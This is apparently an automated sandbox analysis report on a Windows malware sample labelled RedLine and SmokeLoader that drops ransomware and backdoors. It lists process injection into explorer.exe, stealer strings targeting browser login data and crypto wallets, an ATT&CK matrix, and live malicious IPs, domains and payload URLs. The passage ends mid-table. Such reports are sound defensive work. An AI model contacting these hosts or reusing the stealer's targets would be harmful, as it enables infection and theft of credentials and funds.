          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0042BCAF GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeMemory allocated: page read and write | page guard
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00414035 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00417E53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00413F2C SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 37.34.248.24 80
          Source: C:\Windows\explorer.exeDomain query: perficut.at
          Source: C:\Windows\explorer.exeDomain query: potunulit.org
          Source: C:\Windows\explorer.exeNetwork Connect: 190.219.54.242 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.106.124.133 80
          Source: C:\Windows\explorer.exeNetwork Connect: 195.158.3.162 80
          Source: C:\Windows\explorer.exeNetwork Connect: 158.69.96.67 443
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80
          Source: C:\Windows\explorer.exeNetwork Connect: 77.73.134.27 80
          Source: C:\Windows\explorer.exeDomain query: flytourchip.com.br
          Source: C:\Windows\explorer.exeFile created: D8D3.exe.4.drJump to dropped file
          Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
          Source: C:\Users\user\AppData\Local\Temp\E4.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Users\user\AppData\Local\Temp\E4.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
          Source: C:\Users\user\AppData\Local\Temp\3046.exeMemory written: C:\Users\user\AppData\Local\Temp\3046.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeMemory written: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\3046.exeMemory written: C:\Users\user\AppData\Local\Temp\3046.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeMemory written: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 5791B14
          Source: C:\Users\user\AppData\Local\Temp\E4.exeThread created: unknown EIP: 58A19A0
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeSection unmapped: unknown base address: 400000
          Source: C:\Users\user\AppData\Local\Temp\3046.exeSection unmapped: unknown base address: 400000
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeSection unmapped: unknown base address: 400000
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe"
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeProcess created: unknown unknown
          Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.290368021.0000000006770000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.284034500.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A33B.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00413A75 cpuid
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00413CC0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004041D0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA,

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.464907460.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.464370990.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.462319085.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.464693455.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.441770993.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.446299900.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: D8D3.exe PID: 5128, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: llpb1133.exe PID: 2560, type: MEMORYSTR
          Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_electrum:Electrum;26;Electrum\wallets;*;-
          Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_elecbch:ElectronCash;26;ElectronCash\wallets;*;-
          Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*
          Source: D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\exodus\*w
          Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_exodus:Exodus;26;exodus;*;*partitio*,*cache*,*dictionar*
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.464907460.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.464370990.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.462319085.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.464693455.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.441770993.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.446299900.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: D8D3.exe PID: 5128, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: llpb1133.exe PID: 2560, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts11
          Windows Management Instrumentation
          1
          Registry Run Keys / Startup Folder
          512
          Process Injection
          1
          Disable or Modify Tools
          1
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium13
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Shared Modules
          1
          Services File Permissions Weakness
          1
          Registry Run Keys / Startup Folder
          1
          Deobfuscate/Decode Files or Information
          1
          Input Capture
          1
          Account Discovery
          Remote Desktop Protocol3
          Data from Local System
          Exfiltration Over Bluetooth11
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Exploitation for Client Execution
          Logon Script (Windows)1
          Services File Permissions Weakness
          21
          Obfuscated Files or Information
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares1
          Input Capture
          Automated Exfiltration4
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)21
          Software Packing
          NTDS144
          System Information Discovery
          Distributed Component Object Model2
          Clipboard Data
          Scheduled Transfer125
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          File Deletion
          LSA Secrets421
          Security Software Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common11
          Masquerading
          Cached Domain Credentials21
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items21
          Virtualization/Sandbox Evasion
          DCSync13
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job512
          Process Injection
          Proc Filesystem1
          Application Window Discovery
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          Hidden Files and Directories
          /etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
          Services File Permissions Weakness
          Network Sniffing1
          Remote System Discovery
          Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 800784 Sample: file.exe Startdate: 07/02/2023 Architecture: WINDOWS Score: 100 86 api.2ip.ua 2->86 116 Multi AV Scanner detection for domain / URL 2->116 118 Malicious sample detected (through community Yara rule) 2->118 120 Antivirus detection for URL or domain 2->120 122 12 other signatures 2->122 11 file.exe 2->11         started        14 sievwvt 2->14         started        16 3046.exe 2->16         started        signatures3 process4 signatures5 160 Detected unpacking (changes PE section rights) 11->160 162 Maps a DLL or memory area into another process 11->162 164 Checks if the current machine is a virtual machine (disk enumeration) 11->164 166 Creates a thread in another existing process (thread injection) 11->166 18 explorer.exe 12 29 11->18 injected 168 Multi AV Scanner detection for dropped file 14->168 170 Machine Learning detection for dropped file 14->170 process6 dnsIp7 88 flytourchip.com.br 158.69.96.67 OVHFR Canada 18->88 90 23.106.124.133 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG Singapore 18->90 92 5 other IPs or domains 18->92 62 C:\Users\user\AppData\Roaming\sievwvt, PE32 18->62 dropped 64 C:\Users\user\AppData\Roaming\jhevwvt, PE32 18->64 dropped 66 C:\Users\user\AppData\Local\Temp\FB61.exe, PE32 18->66 dropped 68 9 other malicious files 18->68 dropped 124 System process connects to network (likely due to code injection or exploit) 18->124 126 Benign windows process drops PE files 18->126 128 Deletes itself after installation 18->128 130 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->130 23 A33B.exe 5 18->23         started        27 3046.exe 18->27         started        29 D8D3.exe 23 18->29         started        32 6 other processes 18->32 file8 signatures9 process10 dnsIp11 70 C:\Users\user\AppData\Local\Temp\pliu.exe, PE32 23->70 dropped 72 C:\Users\user\AppData\Local\...\llpb1133.exe, PE32+ 23->72 dropped 74 C:\Users\user\AppData\Local\...\XandETC.exe, PE32+ 23->74 dropped 136 Antivirus detection for dropped file 23->136 138 Machine Learning detection for dropped file 23->138 34 llpb1133.exe 23->34         started        37 pliu.exe 23->37         started        39 XandETC.exe 23->39         started        140 Multi AV Scanner detection for dropped file 27->140 142 Detected unpacking (changes PE section rights) 27->142 144 Detected unpacking (overwrites its own PE header) 27->144 146 Injects a PE file into a foreign processes 27->146 41 3046.exe 1 15 27->41         started        96 62.204.41.134 TNNET-ASTNNetOyMainnetworkFI United Kingdom 29->96 76 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 29->76 dropped 78 C:\Users\user\AppData\LocalLow\softokn3.dll, PE32 29->78 dropped 80 C:\Users\user\AppData\LocalLow\nss3.dll, PE32 29->80 dropped 82 4 other files (2 malicious) 29->82 dropped 148 Tries to harvest and steal browser information (history, passwords, etc) 29->148 150 Tries to steal Crypto Currency Wallets 29->150 98 star-mini.c10r.facebook.com 157.240.253.35 FACEBOOKUS United States 32->98 100 iueg.aappatey.com 45.66.159.142 ENZUINC-US Russian Federation 32->100 102 2 other IPs or domains 32->102 152 Maps a DLL or memory area into another process 32->152 154 Sample uses process hollowing technique 32->154 156 Tries to detect virtualization through RDTSC time measurements 32->156 158 2 other signatures 32->158 45 WerFault.exe 32->45         started        file12 signatures13 process14 dnsIp15 106 Antivirus detection for dropped file 34->106 108 Multi AV Scanner detection for dropped file 34->108 110 Machine Learning detection for dropped file 34->110 114 2 other signatures 34->114 112 Creates processes via WMI 37->112 47 pliu.exe 37->47         started        51 conhost.exe 37->51         started        94 api.2ip.ua 162.0.217.254 ACPCA Canada 41->94 84 C:\Users\user\AppData\Local\...\3046.exe, PE32 41->84 dropped 53 3046.exe 41->53         started        56 icacls.exe 41->56         started        file16 signatures17 process18 dnsIp19 104 xv.yxzgamen.com 188.114.97.3 CLOUDFLARENETUS European Union 47->104 60 C:\Users\user\AppData\Local\Temp\db.dll, PE32 47->60 dropped 58 conhost.exe 47->58         started        132 Sample uses process hollowing technique 53->132 134 Injects a PE file into a foreign processes 53->134 file20 signatures21 process22

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe49%ReversingLabsWin32.Trojan.RedLine
          file.exe34%VirustotalBrowse
          file.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\98D7.exe100%AviraHEUR/AGEN.1210601
          C:\Users\user\AppData\Local\Temp\llpb1133.exe100%AviraHEUR/AGEN.1210601
          C:\Users\user\AppData\Local\Temp\A33B.exe100%AviraHEUR/AGEN.1234960
          C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\12C0.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\D8D3.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\FB61.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\98D7.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\ECFB.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\sievwvt100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\llpb1133.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\3046.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\E4.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\jhevwvt100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\4113.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\A33B.exe100%Joe Sandbox ML
          C:\Users\user\AppData\LocalLow\freebl3.dll0%ReversingLabs
          C:\Users\user\AppData\LocalLow\mozglue.dll0%ReversingLabs
          C:\Users\user\AppData\LocalLow\msvcp140.dll0%ReversingLabs
          C:\Users\user\AppData\LocalLow\nss3.dll0%ReversingLabs
          C:\Users\user\AppData\LocalLow\softokn3.dll0%ReversingLabs
          C:\Users\user\AppData\LocalLow\sqlite3.dll0%ReversingLabs
          C:\Users\user\AppData\LocalLow\vcruntime140.dll0%ReversingLabs
          C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe62%ReversingLabsWin32.Ransomware.Stop
          C:\Users\user\AppData\Local\Temp\3046.exe62%ReversingLabsWin32.Ransomware.Stop
          C:\Users\user\AppData\Local\Temp\4113.exe82%ReversingLabsWin32.Trojan.SmokeLoader
          C:\Users\user\AppData\Local\Temp\98D7.exe77%ReversingLabsWin64.Trojan.Generic
          C:\Users\user\AppData\Local\Temp\ECFB.exe56%ReversingLabsWin32.Trojan.RedLine
          C:\Users\user\AppData\Local\Temp\XandETC.exe92%ReversingLabsWin64.Trojan.Generic
          C:\Users\user\AppData\Local\Temp\db.dll42%ReversingLabsWin32.Trojan.Ulise
          C:\Users\user\AppData\Local\Temp\llpb1133.exe77%ReversingLabsWin64.Trojan.Generic
          C:\Users\user\AppData\Local\Temp\pliu.exe85%ReversingLabsWin32.Backdoor.Manuscrypt
          C:\Users\user\AppData\Roaming\sievwvt49%ReversingLabsWin32.Trojan.RedLine
          SourceDetectionScannerLabelLinkDownload
          18.2.ECFB.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          17.2.E4.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          11.2.4113.exe.400000.0.unpack100%AviraHEUR/AGEN.1213203Download File
          15.2.3046.exe.400000.0.unpack100%AviraHEUR/AGEN.1223627Download File
          14.0.A33B.exe.7b0000.0.unpack100%AviraHEUR/AGEN.1234960Download File
          0.3.file.exe.6d0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          17.3.E4.exe.7e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          18.3.ECFB.exe.6e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          27.2.pliu.exe.400000.0.unpack100%AviraHEUR/AGEN.1241636Download File
          0.2.file.exe.680e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          40.2.pliu.exe.400000.0.unpack100%AviraHEUR/AGEN.1241636Download File
          18.2.ECFB.exe.6d0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          17.2.E4.exe.640e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          SourceDetectionScannerLabelLink
          perficut.at1%VirustotalBrowse
          potunulit.org17%VirustotalBrowse
          siaoheg.aappatey.com0%VirustotalBrowse
          flytourchip.com.br0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://potunulit.org/0%URL Reputationsafe
          http://soryytlic4.net/0%URL Reputationsafe
          http://siaoheg.aappatey.com/0%URL Reputationsafe
          http://novanosa5org.org/0%URL Reputationsafe
          http://golilopaster.org/0%URL Reputationsafe
          http://iueg.aappatey.com:80/check/safe0%URL Reputationsafe
          https://xv.yxzgamen.com/2701.html100%URL Reputationmalware
          http://bulimu55t.net/0%URL Reputationsafe
          https://xv.yxzgamen.com/logo.png100%URL Reputationmalware
          http://iueg.aappatey.com/check/safe0%URL Reputationsafe
          http://hujukui3.net/0%URL Reputationsafe
          http://77.73.134.27/llpb1133.exe100%URL Reputationmalware
          http://bukubuka1.net/0%URL Reputationsafe
          http://newzelannd66.org/0%URL Reputationsafe
          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
          http://iueg.aappatey.com/check/safeXdkojlmpp0%Avira URL Cloudsafe
          http://62.204.41.134/_0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef0%Avira URL Cloudsafe
          http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e60440%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/r0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/K0%Avira URL Cloudsafe
          http://perficut.at/0%Avira URL Cloudsafe
          http://perficut.at/tmp/0%Avira URL Cloudsafe
          https://flytourchip.com.br/systems/ChromeSetup.exe0%Avira URL Cloudsafe
          http://iueg.aappatey.com/check/safeB0%Avira URL Cloudsafe
          http://bihsy.com/lancer/get.php100%Avira URL Cloudmalware
          http://iueg.aappatey.com/m0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675preseMu0%Avira URL Cloudsafe
          http://62.204.41.134/0%Avira URL Cloudsafe
          http://perw.facebook.cueg.aappatey.com/check/safe0%Avira URL Cloudsafe
          http://iueg.aappatey.com/check/safei0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b56750%Avira URL Cloudsafe
          http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e6040%Avira URL Cloudsafe
          http://siaoheg.aappatey.com:80/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675?0%Avira URL Cloudsafe
          http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604o0%Avira URL Cloudsafe
          http://62.204.41.134/ll0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28efcfBb4E40%Avira URL Cloudsafe
          http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604n0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=286587&key=075ea35c9751668450c9ec4c0067c0f60%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28efcohor0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675c0%Avira URL Cloudsafe
          http://iueg.aapp0%Avira URL Cloudsafe
          http://iueg.aappatey.com/check/safeT7-16b8-40%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          star-mini.c10r.facebook.com
          157.240.253.35
          truefalse
            high
            perficut.at
            195.158.3.162
            truetrueunknown
            potunulit.org
            188.114.96.3
            truetrueunknown
            siaoheg.aappatey.com
            45.66.159.142
            truefalseunknown
            api.2ip.ua
